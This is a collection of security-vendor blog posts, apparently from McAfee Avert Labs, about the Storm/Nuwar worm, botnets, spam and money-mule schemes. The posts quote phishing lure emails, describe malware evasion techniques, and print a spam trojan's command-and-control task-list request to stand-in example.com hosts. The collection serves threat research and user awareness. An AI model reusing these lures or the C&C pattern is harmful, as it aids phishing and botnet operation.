This morning at 7.00am UTC, still not a single mail. But I saw the bot connecting to the Peer-to-Peer network and transfering data - the same way it used to do the last several days.

I gave MessageLabs a call and they confirmed that the number of intercepted emails containing Nuwar related links had diminished considerably in the past few hours.

So it’s not my goat setup behaving different as expected.

Time to party? Unfortunately not - at 10.45am UTC, my system sent me an alert. New mails got captured. Well, at least it took a nap for 13 hours.

Watch out for mails offering videos from either:

Snoop Dog, Beyonce, Hurricane Chris, Emenem, Lil Mama, Heuy, Chris Brown, Eagles, T-Pain, Fergie, R. Kelly, Sean Kingston, Kelly Clarkson, Velvet Revolver, Fat Boy, Akon, Rihanna, Foo Fighters.

For example:

Š

It used to be one our many mantras, back in the old days, that virus writers do not have QA departments. That is to say, virus infections can cause very odd, unintended consequences.

How many of you out there remember the Bugbear virus from 2002? It had a very odd side effect that it would send its attachments to network printers, causing them to spew tons of pages of apparent gibberish, as it printed out the contents of its executable attachment.

Nuwar is having a similarly strange effect lately, effectively posting itself to blogs, where people have set their blogs to be updated by email. Kind of a bonus spreading mechanism there, as this doesn’t seem to have been intentional.

At this point the social engineering doesn’t translate real well, as it’s really geared towards the email format. It should stick out pretty distinctly on a person’s blog. Of course the usual advice applies… don’t go clicking on strange links. kthx!!!

Hot off the presses - here’s a copy of a new Nuwar email I just got in my inbox:

Welcome Member,

We are glad you joined Downloader Heaven.

User Number: 3692766664
Your Temp. Login ID: user3709
Your Password ID: oh662

Please keep your account secure by logging in and changing your login info.

Click here to enter our secure server: http://555.112.63.49/

Welcome,
Membership Support Department
Downloader Heaven

Now, you’ll note this isn’t a valid IP address.  It seems they’ve officially given up on the e-card thing, and are playing around to see what sort of techniques work better.  I’d guess the “sexy” emails didn’t work so well, as many corporate email filters would have tagged messages with that sort of content.

Apparently, ecard scam doesn’t work that well any more for Nuwar. Or maybe the virus author read Allysa’s post and decided to abandon the ecard plot before it’s too late. Anyway, now Nuwar spam resorted to the eternal sex theme, the favourite among spammers. The latest Nuwar E-mails have an empty Subject: and the contents is like this:

Lonely? Me too. Look what I like to do when I get lonely.
http://555.37.138.40/

or

I never thought I would ever take these kind of pics, but it makes me so wet. take a look, hehe.
http://555.30.9.127/

or… Well, you get the idea. Basic instinct galore!

P.S. I shamelessly copycatted Hollywood - there are no IP addresses beginning with, or indeed containing, 555.

Unless you’ve been living in a cave without email access for the last year, you’ve probably gotten at least one (if not hundreds!) of the emails currently being pumped out by the W32/Nuwar@MM, aka the Storm Worm.  The spam email templates have been getting updated on at least a daily basis lately, which is making this sort of a moving target.  They’re all worded as variations on a theme of “somebody you know sent you an eCard greeting”, and include a link to a website which contains code that downloads a malicious executable.  The name of this executable has been changing regularly, though not near as quickly as the texts of the emails.  For the last several weeks it was “ecard.exe”, and in the last couple days it’s switched to “msdataaccess.exe”. (Thanks to Dmitry’s efforts, we’re able to keep up with this quite quickly)

Where this gets really interesting for me is how this is beginning to affect user behavior:
We’re starting to get samples from people who suspect they’re getting malicious Nuwar emails, which are in fact just plain old-fashioned eCard greeting notifications.

The thing is, they really are right to be suspicious.  Sending eCard greeting notification messages with links in the body ceased to be a good idea several years ago, when the technique of sending emails with links to malicious files started to be regularly used by malware to spread itself.  With Nuwar shifting around their emails so often to evade detection, it’s inevitable that the malicious emails will use wording which is similar to that used by major, legitimate eCard greetings providers.

It behooves the legitimate greeting card companies to come up with a sensible way around this, before it affects their bottom lines.  They’ll need to find a way to get notifications to users that is at once convenient, and not such a huge target for use as a social engineering tactic by malware writers.  Do I know what that would be, at this point?  No, it really is a tricky problem.  And it’s one that’s bound to be faced by other vendors as well (sites which send e-vites, for instance) in the near future.

Few weeks ago I noticed a relative spike in the “You’ve received a postcard from …” spam. Not that I didn’t receive it occasionally before but now it was in noticeable numbers and hitting my mailbox several times an hour. My family told me they were receiving it too. It was, of course, a new wave of Nuwar (aka Zhelatin, aka Peacomm, aka “Storm worm”) spamming. So, I got curious and downloaded several samples from the spammed links. Not using IE or any other browser for that matter - that would be asking for trouble - but using a utility of my own, somewhat similar to wget but developed independently long time ago. I scanned the samples with our latest beta DATs and found that we missed some. Well, given that Nuwar is polymorphically repacked every few minutes and a functionally new version is released every day, that was hardly surprising. I zipped the samples up and sent them to our virus researchers to produce detection for them.

And it continued like that for the next two or three days: periodically I would check my mailbox for Nuwar spam, download the samples, scan them and forward whatever we did not detect to our virus analysts. And then I decided to automate the whole process. Firstly, because after a couple of days I got bored with doing it manually. And secondly, and more importantly, because manual processing was not good enough for keeping up with something changing as quickly as Nuwar. I needed a system that would poll given POP3 mailboxes every few minutes, recognize new Nuwar E-mails, extract the URLs and compromised computers’ IPs from them, submit those URLs to a URL monitoring subsytem. The URL monitoring subsytem should attempt to download samples from the URLs every so many minutes, exclude duplicates by means of calculating, storing and comparing MD5 hashes, periodically (say, once an hour) scan the downloaded samples with our latest DATs, collect whatever is not detected and E-mai it to human and automatic analysts for further processing. And a separate subsystem should keep the local copy of our Scan updated from beta DATs. On top of that, being preoccupied with my other projects, I could spend only an hour or two on this new project.

Fortunately, I already had all the necessary components developed long time ago for my other projects and all I had to do now was put them all together with something like a bunch of BAT files. My wget-like geturl utility I mentioned before supports not only http and ftp but a bunch of other protocols, in particular POP3 - so, that’s what I used for POP3 mailboxes polling. The scanner updating subsystem is part of my VGrep and MiniMavis projects (MiniMavis is a multi-scanner system predating VirusTotal and the likes by years. Not open to the public, though). I also developed a URL monitoring engine few years ago for an internal Avert project. And I have my own hashfile utility, capable of calculating a number of hashes over given files, including MD5. And I have my own mailit utility to send E-mails with attachments. The rest was a matter of using Windows  BATCH scripting - rather useful and powerful enough for statement in particular - and utilities like find and wzzip.

As a result, new Nuwar variants are now spotted and collected pretty much as soon as they appear and if we do not detect them on the spot, we detect them an hour or two later

W32/Nuwar aka Storm worm authors have been active again recently. It is speculated to be one of the largest botnets and has the potential to launch a mammoth DDoS attack. The huge rise in the numbers of botnets lately has been attributed to the social engineering tactics that recent eCard spam mails employ. This threat is also believed to be behind the recent spams of RAR-Compacted text files.

This notorious group is not only focusing on ‘improving the effectiveness’ of their spam but are also trying hard to evade detection of the malignant eCard executables by using some of the techniques as mentioned below.

There is a re-emerging trend among malware to parasitically infect executables that are already listed in the startup registries to insert loader code for malicious binary instead of using the traditional techniques of modifying the startup registry. This could potentially help bypass some of the tools that system administrators might use to inspect the registry for suspicious executables. Recent variants of Nuwar parasitically infect the tcpip.sys to insert the loader code for its malicious device driver file. It is a pretty interesting technique to specifically target and infect Windows device driver files (tcpip.sys in this case). The following image shows the malicious code inserted at the end of the infected tcpip.sys file whose entry point is modified to point to this.

Nuwar variants have also been using ‘Server-based Polymorphisms’ to evade detection, wherein the code for the top-level decryptor of the executable hosted on the server keeps changing while still preserving the overall semantics. A cocktail of some of the following anti-emulation techniques is also frequently introduced; the code for these is constantly morphed as well.

- Use of various MMX instructions
- Using fake API calls: most Nuwar variants make fake Windows API calls such as CreateMDIWindowA, ILGetSize etc. This is not dead code. These API calls are fake because they are not called to solve the actual purpose they exist for. Instead, null or junk parameters are passed and the returned error codes are validated during decryption.
- Verifying the value at the end of Structured Exception Handling chain.

We are keeping our eyes open!

McAfee Avert Labs had several presentations this year. One each at BlackHat and DefCon.

John Viega and David Coffey presented on Building an Effective Application Security Practice on a Shoestring Budget at BlackHat. I heard quite a bit of positive feedback on this at the conference itself. Kudos and extra points to both John and Dave to working in beer references!

Toralv Dirro and Dirk Kollberg presented Trojans: A Reality Check at DefCon. This one was also very well received (I actually got to attend this one!) and they were swamped (maybe not the best choice of word but many people came up to the podium anyway) with questions afterward. They gave a great update on trojans in general as well as a technical dive into recent developments on the German malware scene. Dirk even showed a fascinating command and control demo that illustrated the ease of malware creation and control.

Enjoy!

DefCon gets quite a lot right and it is not just great content. Actually the content, IMHO, might be the LEAST important aspect to DefCon.

Let’s be honest here. We are all infosec warriors in the information age. We all keep pretty much up to date on security research, malware developments, game hacking, etc…. on a daily basis. Blogs, forums, podcast and other mediums allow us to stay bleeding edge. We have to. Most information in most presentations at most conferences is a good 6 months old (not always, but usually). This is where DefCon distances itself from the pack.

If you really want to see where security theory and research practicality collide (fueled by Brew and Coffee Wars!) then the floor of DefCon is the place to be. Truthfully, it is the activities of DefCon, not the presentations, that you need to get caffeinated for:

* The Network @ DefCon
* 0wn the b0x
* Phreaking Challenge
* CTF (if you gotta ask…….)
* aCTF
* LPCON5 - Lockpicking Contest
* Hacker Jeopardy (one of my personal favorites)
* TCP/IP Drinking Game
* Wardriving Contest
* Wireless Village - ChurchofWiFi
* Lockpicking Village

No disrespect to the presenters or any of their content but pwning-in-action is what makes DefCon well…….. DefCon. This is where the training, conferences and theory all meets the pavement. Can you get root? Can you stop someone from getting root? Do you really know what you are doing? Hey, is that a custom PWS variant that just pwned my data? Ohhhh, I never saw that evasion before!!! It is events like the above where the real education takes place.

Oh and the the Toxic BBQ! Part 2 later today…..

While I was going through my personal email last night, what turned out to be a spam email struck my eyes. Coincidently, it contained some references to something I’ve been researching recently. Facebook.

First thing that came to my mind is that I was targeted because I have a .edu address, and Facebook was originally used solely by students. After spending a couple of minutes inspecting that spam, it was obvious that the spammer didn’t utilise Facebook in any technical manner but rather as a pure social-engineering trick to get people to read that spam.

Natalie made her first appearance in that spam asking me to add her contact to my MSN Messenger account, because she thought that I was “hot” (yeah, right!). In a successful scenario, the recipient would have thought that “Natalie” has checked their profiles in Facebook and seen their main photo.

So, I created a new account to see where this spam is going to lead me. Natalie turned to be an MSN bot with an “appealing” avatar. The bot itself wasn’t engaging itself in any sort of conversation rather than trying to get people “tempted” to step to the next stage. Natalie-the-bot used a couple of tricks to imitate real human conversational behavior. Every time it sent me a lengthy message, it didn’t send it in one burst. First, I was shown the message that Natalie was writing something to me in order to give me the impression (and keep me on my toes) that a human was writing. Second, it sent me a .JPG attachment of a larger version of the avatar it used (which never arrived!). It was never meant to be delivered anyway!

By the end of the “conversation” this spam was actually trying to get people to submit their credit card details in exchange for some live webcam shows by the infamous Natalie. Allegedly, there was a real Natalie which was causing all this noise. I hope that nobody has fallen for this or similar tricks.

Last Thursday we noticed a large spam campaign atempting to discredit Spamhaus and DDOS their phone lines :roll:. This is undoubtedly linked somehow to the massive and long term DDOS attacks on the three major blacklists run by Spamhaus, URIBL and SURBL (The latter two are currently being protected buy the DDOS Jedi at Prolexic). DDOS’s on this scale are risky for the botmasters since it exposes the botnets to those interested in such things.

Here is a copy of the mail:

From: Christy June <fake-sender@fake_place.com>
Date: Fri, 5 Jul 2007 20:34:52 +0100
To: “some, one” <spamme@mcafee.com>
Conversation: Which shalom myself magnetic
Subject: What shalom herself magnetic

WORKING TO PROTECT INTERNET NETWORKS WORLDWIDE
Spamhaus tracks the Internet’s Spammers, Spam Gangs and Spam Services, provides dependable realtime anti-spam protection for Internet networks, and works with Law Enforcement to identify and pursue spammers worldwide.

The SBL database is maintained by a dedicated international Spamhaus team based in 9 countries, working 24 hours a day, 7 days a week to list new confirmed spam issues and - just as importantly - to delist resolved issues.

The Spamhaus Exploits Block List (XBL) is a realtime database of IP addresses of illegal 3rd party exploits, including open proxies (HTTP, socks, AnalogX, wingate, etc), worms/viruses with built-in spam engines, and other types of trojan-horse exploits.

The Exploits Block List can be used by all modern mail servers, by setting your mail server’s anti-spam DNSBL feature (sometimes called “Blacklist DNS Servers” or “RBL servers”) to query xbl.spamhaus.org. Use of the XBL is free for users with normal mail servers (but networks with high email traffic should see DataFeed).

You can get MUCH MORE if you contact us:

The Spamhaus Project Ltd. 50 Churchill Square, Suite 6, Kings Hill, West Malling ME19 4YU United Kingdom, Tel (+44) 870 766 xxx

This is not an uncommon event for RBL owners, however this one is only unusual because of the size, duration and indescriminate nature of the campaign.

The spammer in this case also had to fake the senders address because Spamhaus’s SPF record is of the “-all” variety which sensibly denotes that they *only* permit one IP address to send mail for their domain and so affecting the bots ability to deliver further.

Obviously Spamhaus do not use botnets to send out promotional material
(If this all sounds a bit too fishy to be true you can read more about the traditional “Joe-Job” attack right here).

Are you one of the millions who’s been infected by a bot?

If you have, the FBI wants to hear about it.

The agency has recently launched “Operation Bot Roast” to coordinate and bring more visibility to their efforts to dismantle botnets. As part of the effort, they’re trying to get people who have been infected with bots to file a complaint through their Web site. If you know that you’ve been infected, please go and file a complaint report. Every report helps identify these criminals and bolster the case against them.

(An anti-phishing reminder: The FBI will not contact you online and request your personal information–you must go to them to make the report.)

So if you’ve been infected, you can do your part to make the net a safer place!

Today marked the inaugural HotBots conference in Boston, MA. It was a relatively small crowd, also including a good number of academic researchers from schools around the country, gathered to talk about bots. There were 11 short presentations, a panel, and a number of very brief Work in Progress presentations. The content was decidedly great, running the gamut of bot-related topics. The future of botnets in peer to peer C&C channels, problems and techniques in counting the size of botnets, legal issues for botnet researchers, and some detailed break-downs of specific bots… it’s hard to focus on what info to relate, as there was so much good material!

The first concept that struck me as interesting is that, again and again, people noted that the majority of bots are still your basic, vanilla IRC bots. The encrypted bots, the ones using custom IRC commands, the ones using P2P C&Cs, they’re the ones that people who monitor bots are finding less than 10% of the time. Why is this? Well, what reason do they have to upgrade right now? Even with relatively minor hardening, they’re finding very little resistance. It’s not really worth the investment to find or learn how to use the more cutting-edge technology. Which makes me wonder - why are we not seeing more IRC traffic filtering? Would you, as a consumer, pay for an ISP that kept the vast majority of bot traffic out of their network?

The second concept that both made my hair stand on end and made me rather proud was the talk about the potential minefields for botnet researchers. There are all kinds of restrictions on the Good Guys about what they can and can’t do to protect their customers or their networks, with good reason. These restrictions protect the privacy of you and me as well as the Bad Guys, equally. If a researcher violates these restrictions to get at a Bad Guy, they risk drawing the wrath of the Bad Guy and all of his friends (maybe even their mafia employers), and perhaps their own government if that researcher were to damage evidence used in a criminal investigation. Perhaps this researcher will even run afoul of foreign governments if they’re the ones who’re being hampered by the damaged evidence, which could mean extradition to some place whose means of punishment are even less comfy than those in their home country.

Here’s the proud part: Even with the restrictions, even with the looming dangers, there’s still a growing community of people who’re passionately pursuing an answer to these problems. It’s gone well beyond the borders of just the security industry now. We’re all still fighting, trying to make a dent in the growing tidal-wave of malware. It’s a community I’m very happy to be a part of, and I hope these community-building workshops continue to grow. With more and more eyes on the problem, perhaps some day we can stem the tide.

Looks like the Backdoor-DKV (aka IrnBot) author is getting smart–at least that’s what he thinks. Apparently he added some RE-avoiding mechanisms to his super-hyper-extra-modular lame bot. Which, by the way, does not prevent in ANY way the analysis of the bot. Fun, fun, fun! (For us, that is.�

Malware authors have been at the cutting edge of incorporating exploit code into their creations for zero day vulnerabilities. Fueled by financial incentives and readily available source code, the bad guys of today aggressively pursue continued development of malware code. Over the years, the window between vulnerability discoveries to its incorporation into a worm or exploit candidate has shrunk from months, to weeks, to zero day. This leaves administrators with very little time to schedule and deploy patches to all servers and workstations on their networks. And during this vulnerable time frame if the network is hit with a bot that uses a zero-day vulnerability, an organization could be faced with a potential worm outbreak or large scale attack.

The chart below shows the time frame between the vulnerability being reported and how long it took for malware authors to incorporate it into a worm candidate.

The paper “Defeating bots on the internal network” from McAfee Avert Labs published in the Feb 2007 issue of Virus Bulletin describes setting up an IRC honeypot on a network using minimal resources and requiring little maintenance to be used as an early warning system to proactively alert botnet activity. Also discussed is using the internal IRC honeypot to gain control over infected machines and removing the bot from infected machines.

From time to time we see malware writers claim or ask for recognition of their malware. They usually leave messages in the virus body for the AV companies to see. They might ask for jobs, or offer help to detect something–you will never understand a malware writer’s mind.

Today I was analyzing YAB (yet-another-bot) and found the following message in the virus body:

“ATTN ANTIVIRUS EMPLOYEE: If you’re going to name my very nicely coded modular bot, at least give it the proper name of ‘[Name Removed]Bot.’ Lots of love, Author of [Name Removed]Bot.”

Of course, we will NOT put the author’s name on the bot, so it will remain just a regular bot.

Gee, I really feel like someone important these days. I’ve gotten 2 offers to join the bot economy this week alone!

The most recent one was an email entitled “extra money fast and easy” offering me an “entry level opportunity in the field of financial services”. It starts right off sounding distinctly fishy and unprofessional:

We are a small and relatively Software Development and Outsourcing Company specializing in enterprise application development, system integration, corporate networks and other software solutions for business, finance, and for various types of problems. The company based in Ukraine but at this time we open new office in Bulgaria.

After some description of what they purport to do as a “company”, it then goes on to give a fairly good description of what all will be transpiring:

If you are looking for a chance to make an additional profit you can become our representative in your country. As our representative you will receive 8% of every deal we conduct. Your job will be accepting funds in the form of wire transfers and check payments and forwarding them to us. It is not a full-time job, but rather a very convenient and fast way to receive additional income.

The next paragraph is where we get a particularly odd incentive:

Our financial professionals work with clients to help them achieve their many financial goals such as saving on taxes.

Why yes, taking a cut of stolen funds is certainly one way to make untaxed income. The downside of this being that these mules are the ones who’re most easy to apprehend and prosecute.

Another message I got the other day was via IM, coincidentally while I was at the ISOTF meeting. This one was discussing the other end of the bot economy:

I sell things, adena, characters, a time of a card
Pin codes the Internet of providers and mobile operators.
In online games WoW.Lineage2
ICQ dispatch is cheaper than at all…
So ICQ numbers 5-6-place numbers cheaply.

The first part of the email seems to have been in Russian, but it didn’t come through well, so I’m only including the translation which was included at the end. The first and third lines seem to be dealing with online game credentials. I’m not wholly sure what’s meant by “time of a card”. He also offers ISP and mobile passwords, along with hacked ICQ accounts. He’s a veritable one-stop shop for identity theft!

Clearly they’re not being particularly picky about the recipients of these offers. Yet another illustration of how bot herders are using the shotgun approach. The first email was actually sent to my work address. You’d think they’d exclude AV company addresses from these things…

This last week I was among those at the “secretive conference” of security folks, ISPs and law-enforcement agents to discuss bots. Much like at last year’s VB conference, there was much discussion about the need for more cooperation and information-sharing between bot-fighters. Not just within the three groups but within each of the individual disciplines. People within all of the three groups were clear that none of us have all the pieces of the puzzle, and that in order for us to truly make a dent in the growth of bots and botnets, we need to share more of our information with each other.

There has been much made of turf wars within the bot herder community, but the more notable thing in terms of fighting these bots is actually how much they’re cooperating. We know they’ve been pooling resources to code their bots, but apparently they’re also sharing botnet resources quite widely (for instance, to take down a particularly robust website that they wish to attack).

There was a significant sense of frustration from all concerned about the lack of resources for the Good Guys, versus the rewards for the bot herders. Often an iron-clad case will be given to the relevant authorities, only to have the case go nowhere because the bot herders are minors and/or from a non-cooperative country.

The good news in all this is that, while things may look dim at times, events like these can and do create a lot of good connections in important places. It’s about getting the right information to the right people to not only take down isolated pieces of the puzzle, but larger and more significant chunks of the gangs behind this crimeware.

In the “good old days” spammers aggressively scanned the Internet for open relay servers to send spam. Open relays are out of fashion these days. So much so that the Open Relay DataBase is shutting down due to changes in spammer tactics.

Today’s spammers, in collusion with malware authors, infect thousands of machines on the Internet turning them into spam relay zombies. These zombie machines connect to a web server controlled by the spammer, which provides a constantly updated live feed of email addresses and content to spam. The content could be anything from pump-and-dump stock spams, online pharmaceutical drugs or the usual penis enlargement. Each individual zombie machine is capable of sending hundreds of spam emails per minute depending on the bandwidth available. Example: Spam-Maxy, Spam-Loot

And with more machines having access to broadband and ADSL connections, it provides a fertile breeding ground for this unholy alliance of malware authors and spammers to take advantage of.

At McAfee Avert Labs Bangalore, we sampled emails that were captured by our honeypot this quarter. The following chart shows the content of the email messages captured during in-house live testing of malware:

Only 11% constituted executable attachments. 2% were mails containing infection notifications or captured cached passwords that were meant for the trojan author. The rest, some 87%, was spam. A high percentage of this spammed content was image spam and ASCII art; techniques that spammers have effectively used to subvert traditional detection by anti-spam vendors.

Although we have seen malware-controlled spam networks in the past, most notably the W32/Bagle and W32/Sober families, the complexity and sophistication seen in the W32/Stration and Spam-DComServ trojans of today, demonstrate the alarming advancements made by these digital miscreants. McAfee Avert Labs continues to keep a close watch on these recent developments in the spam world.

Technologies advance with time, and so is the case with Instant Messengers. Not long ago, people were happy sending text messages. Then VoIP came along and changed the scene. Soon after IM vendors embraced it. Many IM clients are now VoIP enabled. As soon as VoIP started going deeper into the mainstream, security researchers warned of related issues. One issue was abuse with spam, usually referred to as SPIT. Wikipedia states SPIT is “as-yet-nonexistent problem“. As VoIP is getting more popular the scenario is changing fast, this “as-yet-nonexistent problem” is slowly but surely emerging. The following images shows a real-world VoIP spam over Skype.

The image shows a typical spam prospect. The spammer starts a conference call with some random users and starts playing the spam message. This process is most likely not manual but automated with bots.

Use and abuse are two sides of the same coin and this technology is no exception. All major IM providers are giving away SDKs to develop add-ons. However these SDKs also lower the bar for spammers to develop bots. We have witnessed the same with the ongoing development around Skype malware.

The image below shows the assembly code for the loop which is used by Skype malware to search for users. You will notice the “SEARCH USERS” Skype APIs:

The malware actually uses more of these. The image below will highlight those:

These APIs are part of Skype SDK and are documented by skype. It is just a matter of time before we start seeing bots, in the wild build on top of IM SDKs provided by the vendors. We advise users to be aware of this developing attack vector. McAfee Avert Labs is prepared for this battle!!

Malware authors have been pro-active in including exploit code for almost every new vulnerability reported into bots with utmost professionalism. Apart from the numerous Microsoft windows vulnerabilities where exploit code has been methodically incorporated into bot code, McAfee Avert Labs is seeing a trend where popular applications from software vendors are being targeted. In recent weeks we have seen bots that target vulnerabilities or weak passwords in the following applications:

Famatech Remote Admin http://vil.nai.com/vil/content/v_140984.htm
Symantec Antivirus http://vil.nai.com/vil/content/v_140978.htm

Although the vulnerabilities in the above software are dated and patches available, bot authors still found them enticing enough to target machines running vulnerable versions of the these software applications.

Other popular software applications with vulnerabilities that have been targeted by bots in the recent past include:

• CA BrightStor
• Dameware
• MySQL
• WU-FTP
• VNC

Most of the major software vendors like Adobe, Microsoft and Oracle now follow a monthly patching cycle and administrators have their hands full in ensuring that every machine on the network is patched. Sadly, most administrators do not have the flexibility to deploy patches immediately to machines on the network for policy reasons. For example, the organization could be using legacy software which could break if a new service pack was applied and keeping these legacy applications running takes precedence over applying the latest hot fixes. In rare cases a fix could break something else in the operating system or adversely affect other applications. Administrators need more time to first deploy these hot fixes in a test environment and QA them properly before deploying them to the entire enterprise.

Given the trend where malware authors are expanding their attack horizon by targeting vulnerable software applications, it wouldn’t be surprising if an exploit directed at popular instant messaging (IM) clients should surface. IM is popular both in consumer and corporate networks and an exploit that gives remote shell on a machine running an instant messenger would be stunningly effective.

That being said, it will be interesting to wait, watch and revisit this topic if and when an instant messenger remote shell exploit surfaces.

Today, Avert Labs announced the availability of its podcast on the “Top Ten Security Trends in 2007”.

As part of this podcast, McAfee will identify those threats it believes businesses and consumers will face in 2007 as computer criminals become more organized and professional in their approach.

Download the podcast

Ever wondered how a trojan infected computer gets its orders to spam? Take a peek with me into one trojan’s junkmail activities. The following account is happening as I type, and shows that some image spam is not unique even though it appears to be random.

The smtp sending trojan first phones home for its task list, via http on the smtp port (25). Port 25 on the host machine is running Apache/1.3.37 — this is a very unusual place to find apache running.

The task list looks like this:

$GET "http://example.com:25/outtask/urlTask8_c_2.txt?id=MAGID-ID-STRING&flag=1"
10
12|http://serv2.example.com/outtask/tasks/task_12_letter_1162390208.txt|
http://get.example.com:8092/cgi-bin/cgi2.cgi|
http://serv2.example.com/report2.cgi|1||
http://mail.example.com:8888/cgi-bin/put|

20|http://serv2.example.com/outtask/tasks/task_20_letter_1162390209.txt|
http://get.example.com:8091/cgi-bin/cgi2.cgi|
http://serv2.example.com/report2.cgi|1||
http://mail.example.com:8888/cgi-bin/put|

22|http://serv2.example.com/outtask/tasks/task_22_letter_1162390209.txt|
http://get.example.com:8092/cgi-bin/cgi2.cgi|
http://serv2.example.com/report2.cgi|1||
http://mail.example.com:8888/cgi-bin/put|

^{(line breaks and spaces added for readability)}

The response it got is in the following format:
“tasknumber|spam-text URL|Address-list URL|Report address|1||Report address2|”

So in the example above, the bot got 3 tasks. We’ll take a look at the first one in more detail….
Read the rest of this entry »

There’s something that I’ve been hearing mentioned a lot lately, particularly from those in law enforcement circles - the importance of “mules” in bot-related money making schemes. These are work-at-home type jobs which are offered through very professional-looking websites, through classified ads, and even through IM.These are a crucial part of the reason so many bots are able to be run from places around the globe. In order to get merchandise (often to re-sell) or cash with stolen credit card credentials, the thieves have to go through more strict regulations if the goods are going to another country. To get around these regulations, they use these mules within those originating countries.

These mules are often someone who’s desperate for money or someone who figures it’ll be the (unfortunately fictitious) company who’d get in trouble rather than themselves, so they tend to ask few questions of their “employers”. Laws in most countries are better able to handle this sort of trafficking of stolen goods, so it tends to be these small-time players who are most often prosecuted within the web of illegal botnet activities.

There’s been discussion lately about whether we’ve already lost the war against malicious bots. Certainly things are looking fairly grim as the rise in the number of variants of IRC bots has grown by leaps and bounds over the last couple of years. Strictly using string-based detection against the unending tide certainly appears to be a lost cause.

On the other hand, there are some more promising developments in recent years:

• Most AV vendors at this point have gone to using some sort of generic detection or behavior-based heuristics against the most popular bot-families, which can proactively detect a certain amount of new bots
• Firewalls and IDS/IPS products are becoming more widely used, even by home users
• Many corporations are blocking IRC traffic
• ISPs are increasingly involved with security groups that have developed to shut down Command & Control channels used by bots

From my perspective, I see a few things being particularly important in solving the bot problem:

• Further cooperation of security companies and ISPs in order to get more C&Cs shut down
• Further cooperation of security companies, ISPs and Law Enforcement agencies in order to ensure more bot masters face legal action
• ISPs offering more security services than simply AV software (i.e. traffic filtering)
• More security information being available to novice users (i.e. http://pbskids.org/license/)
• More accountability for adware vendors who fund these malicious affiliates
• A paradigm shift, particularly in the home user area, to a security strategy of strategically allowing known-good traffic rather than strategically blocking known-bad traffic

What are your thoughts on the general state of things?

Have the Bot Wars been lost? What more could be done to ensure that Bot Masters don’t make the internet completely unusable?

Today’s mass mailers are often seeded from thousands of zombie drones connected to botnets. Time on a botnet can be bought, for the right price, to launch the next mass mailer variant. Then when these zombies are instructed to download and execute a worm, a mini outbreak can be created when thousands of machines over the internet simultaneously start mailing copies of the worm. However, these artificial outbreaks die by themselves when antivirus vendors come out with updated detection for the worm.

By using enticing subjects and message bodies and spoofing the ‘from’ address to appear from trusted sources, mass mailers have traditionally depended on social engineering techniques to get a victim into executing a malware attachment. Given that mass mailers seem out of vogue these days with malware authors focusing on more effective infection vectors like operating system or browser vulnerabilities, it’s nostalgic when we see a new “old” kid in town.

W32/Stration is a mass mailer that has been around since August this year and is one of the few active and evolving mass mailers in recent times. Very typical of the mass mailing variety, W32/Stration harvests email addresses from an infected machine and mails a copy of itself using some convincing message bodies.

A sample spoofed email message is as follows:

“Our firewall determined the e-mails containing worm copies are being sent from your computer. Nowadays it happens from many computers, because this is a new virus type (Network Worms). Using the new bug in the Windows, these viruses infect the computer unnoticeably. After the penetrating into the computer the virus harvests all the e-mail addresses and sends the copies of itself to these e-mail addresses. Please install updates for worm elimination and your computer restoring.”

Leaving out the poor grammar, such a dire message appearing to come from the administrator of your company could be stunningly effective in getting uninformed users to take the bait.

W32/Stration uses a self updating mechanism to keep itself going. Infected machines connect to a hard coded url in the body of the worm to download possibly a newer version of the worm and execute it. This ensures that worm remains undetected for an extended period of time and ensures a longer shelf life in the wild.

The author seems to be investing considerable time and effort into unleashing newer variants of W32/Stration on to the internet. But it’s surprising that no lucrative payloads like adware or password stealing trojans have been seeded onto infected machines. One can only wonder about the objective behind developing and releasing newer variants of this worm. Is the current wave being used to build a massive pool of infected computers for a larger scale of attack on the internet? Sadly, the motive behind unleashing this worm is still unknown at the time of writing this blog. McAfee Avert Labs continues to keep a close eye on future developments of W32/Stration.

The online gaming industry has matured into a serious business with revenues running into the billions of dollars. As we know, once something gains popularity on the Internet and is profitable, it becomes an attractive target for hackers.

In the early days, game crackers spent quality time breaking cd protection or gaining secret codes to unlock hidden weapons and levels. With the advent of both Online Games and Massively-Multiplayer Online Role Playing Games (MMORPG), official gaming networks now require legitimate cd keys and/or registered accounts to logon and play online. Virus authors responded by unleashing a rash of trojan horse programs masquerading as game cheats or trainers in order to steal cd keys of Online Games. To get a victim to run these trojans, these files were posted on bulletin board systems, internet relay chat channels or on popular gaming site forums. But the intended victim still had to download and execute the trojan for the ploy to work.

So the obvious question was “How to make a self spreading game cd key stealer?” Sdbots and Gaobot with multiplying capabilities via exploits and weak passwords were readily available at that time. It wasn’t long before a module was written and introduced in the bot code to steal game cd keys of popular online games from Electronic Arts, id Software, Red Storm and Valve. Fortuneately most of the bots in the wild these days have dropped this functionality as the popularity of some online games has waned recently.

Massively-Multiplayer Online Role Playing Games like Lineage, World of Warcraft and the Final Fantasy series rule the gaming world today with an insane number of hardcore
gamers competing against each other in the virtual world. Everyday, McAfee Avert Labs receive numerous malware samples designed to steal game account information targeting popular game titles. And in a shift away from trojan horse programs masquerading as game cheats, we are seeing a trend where virus authors are writing old school viruses like W32/Bacalid, W32/Detnat and W32/Philis that target popular role playing games.

Are these guys doing it for the love of the game? Nope.. sounds too good to be true. Underground RMT (Real-Money trading) groups thrive in dealing with stolen game accounts and operate mostly out of Asia. And with a player’s stolen account information, their virtual assets can be transferred to another players account or simply auctioned off and sold for real money. This phenomenon is currently region specific but could easily reach menacing proportions similar to the threats plaguing online internet banking.

A vast majority of IRC based bots seen these days can be said to be on “Autopilot” in a sense. After joining a pre-defined IRC channel the bots read channel topics and accept them as commands. Authors of such bots just need to set these channels up with correct commands and then leave it up to the bots to spread and possibly go and earn money for their authors.

In general, such bots perform the following steps

1. Query for the domain where the IRC server resides
2. Try to connect to an IRC server at some predefined set of ports
3. Once connected to the IRC server , join a predefined channel by issuing “JOIN =C2=BCbr /> “
4. Read the topic for the channel and accept it as a command

Generally, the topic of the first channel instructs the bot to join other channels, the topics of which may in turn cause the bot to execute various commands or further join more channels. The major functions that such bots generally perform for their author are i) Spread: increase the size of a botnet by scanning the network and infecting other vulnerable machines. ii) Earn money: by downloading adware, stealing personal information etc.

Different bots may connect to different domains, ports, channel names and may download different adware etc but the overall working mechanism remains the same: once the channel topics have been set, they all go about on their own adding more machines to botnet and earning money automatically. While his bots are on autopilot the author may have fun relaxing or may be spend his time on things like researching new vulnerabilities to exploit rather than just sitting in a channel and issuing the same commands to each new machine that joins.

